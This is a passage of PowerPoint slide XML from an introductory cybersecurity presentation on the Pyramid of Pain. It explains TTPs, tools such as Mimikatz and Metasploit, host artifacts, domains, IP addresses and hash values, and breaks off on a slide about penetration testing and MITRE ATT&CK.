              <a:rPr lang="en-US" sz="40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TTPs (Tactics, Techniques, and Procedures)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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C113248-9759-DE75-57A9-5481C5287E87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="37379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sz="20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Inter"/>
              </a:rPr>
              <a:t>Key Idea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Think of TTPs as the attacker’s playbook—the overarching strategies they use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Consider a scenario where attackers use phishing to gain initial access and then move laterally across a network. This entire “game plan” is part of their TTPs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Insight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Disrupting these core strategies forces adversaries to completely change their approach—like stopping a sports team by dismantling their game plan rather than just blocking one pass.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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718ADE8-B2BE-5F74-9AE6-DB58A778DD1B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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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8582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7512B5-4C8B-D1FC-E8A8-BB9C624B9B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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A984BAA-28FE-27EE-F4E5-9D3622D9323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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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DC9AC5A4-86F7-1B8D-EBC8-CE3E1D93A2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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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84F3825-1868-F998-9233-1642E06E49C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="32762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sz="20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Inter"/>
              </a:rPr>
              <a:t>Key Idea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Tools are the specific programs or utilities attackers use to execute their strategies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Tools such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t> for credential dumping or Metasploit for exploiting vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Insight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Although blocking a tool (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>) can slow an attack, attackers can easily switch to another tool. It’s like a mechanic swapping out one tool for another if one gets locked away.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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A9FF561-627D-0410-7298-1C21E41FF31E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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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3129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1939B9-43D4-9927-5C84-1B39F75125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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCD0FD46-779C-693A-73AC-EBB2F1B06C8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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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48950011-3051-BBA3-E4EE-1DDB17D58C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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Network/ Host Artifacts</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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C53060A-D68C-65D5-A30D-1BE6DC0C8B4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="41996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sz="20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Inter"/>
              </a:rPr>
              <a:t>Key Idea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: These are the digital footprints left behind during an attack (logs, registry changes, file modifications).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: An unusual entry in a system log or a modified configuration file that indicates an intrusion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Insight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Artifacts are temporary—attackers can erase or alter them once they know they’re being watched. It’s similar to cleaning up after a crime scene; evidence might vanish if not captured in time.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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591FBE6-80FC-2BA1-2352-258897D84378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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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1469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38A112-F243-0F22-87C2-57328AE0A7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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78ECA1F8-21B1-F75A-8DA2-B6EF8210177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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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95567BAA-81EC-00FE-BA08-19892EEF27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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Domain Names</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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455DAD5-CF2E-E95E-E220-34A2C1EE9E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="32762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sz="20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Inter"/>
              </a:rPr>
              <a:t>Key Idea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Attackers use domain names to host phishing sites or command-and-control servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: A fake website mimicking a bank’s login page, set up on a newly registered malicious domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Insight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Domains are highly disposable. If one is blocked, attackers can quickly register another—much like changing phone numbers when one gets blocked.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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C78A6E1-B3F9-75D3-7E7E-D21175BCFBA3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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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08308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432B0F-D577-441A-6C04-DDC05183C0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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B467C3-EFAC-4561-AB81-D4572168C55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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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C8976850-2145-2A5F-50FE-82C78A0647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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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IP Addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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589BF94-D6AA-D137-8D80-4BE32D570FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="32762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sz="20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Inter"/>
              </a:rPr>
              <a:t>Key Idea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: IP addresses are the numerical labels assigned to devices that attackers use for routing their attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: An IP address associated with a botnet used to distribute malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Insight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Like domains, IP addresses are easily changed. An attacker can shift to a new IP via VPNs or proxies, making blocking a short-term fix.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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F2399FE-0BC7-4854-8C23-18E63A5615EE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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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8212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5E1AF21-8B16-E058-A0EA-268395B492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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1991BC52-1469-FD15-6C39-47371ADFEE1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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-95446" y="-154744"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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DCA862E1-569A-6DA0-09FB-73D50DFCC2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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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Hash Values</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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DCEB9A4-B69B-AE85-AA05-B99A5AC1D7DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="1507336"/>
            <a:ext cx="10195562" cy="32762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sz="20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Inter"/>
              </a:rPr>
              <a:t>Key Idea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Hash values are digital fingerprints for files, used to identify known malicious code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: A specific hash value tied to a known piece of malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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Inter"/>
              </a:rPr>
              <a:t>Insight</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>: Hash values are the easiest for attackers to change—a small tweak in the file alters its hash completely. It’s akin to changing the cover of a book; the content might be similar, but the fingerprint is different.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Inter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941B739-EBF1-66EA-4DD0-3503F8EACB75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35"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9941688" y="5821908"/>
            <a:ext cx="1761829" cy="7281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169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9D3582-F65F-1DF7-B9E1-669D1AF5D3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black background with white dots">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95CF8C25-AF01-D289-8652-84DEC9B4A0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/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="308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18" t="1277"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-68972" y="-187568"/>
            <a:ext cx="12382892" cy="7167488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="43137"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection stA="45000" endPos="65000" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            <a:softEdge rad="0"/>
          </a:effectLst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CE94ED2D-D6C5-AB11-ACDA-AB2B9AE96E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8" y="333906"/>
            <a:ext cx="11353802" cy="1029228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="40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PENETRATION TESTING: Your Cybersecurity Fire Drill</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="4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E25A2DB3-1EAF-870C-2E00-43267FEA34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540935"/>
            <a:ext cx="10515599" cy="4800600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IN" sz="2000" b="1" dirty="0"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🛡️ Simulated Attacks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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Friendly knights test your castle walls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="20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📖 MITRE Frameworks</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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en-IN" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8FAF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Hacker playbooks (ATT&amp;CK) &amp; AI </a:t>
            </a:r>
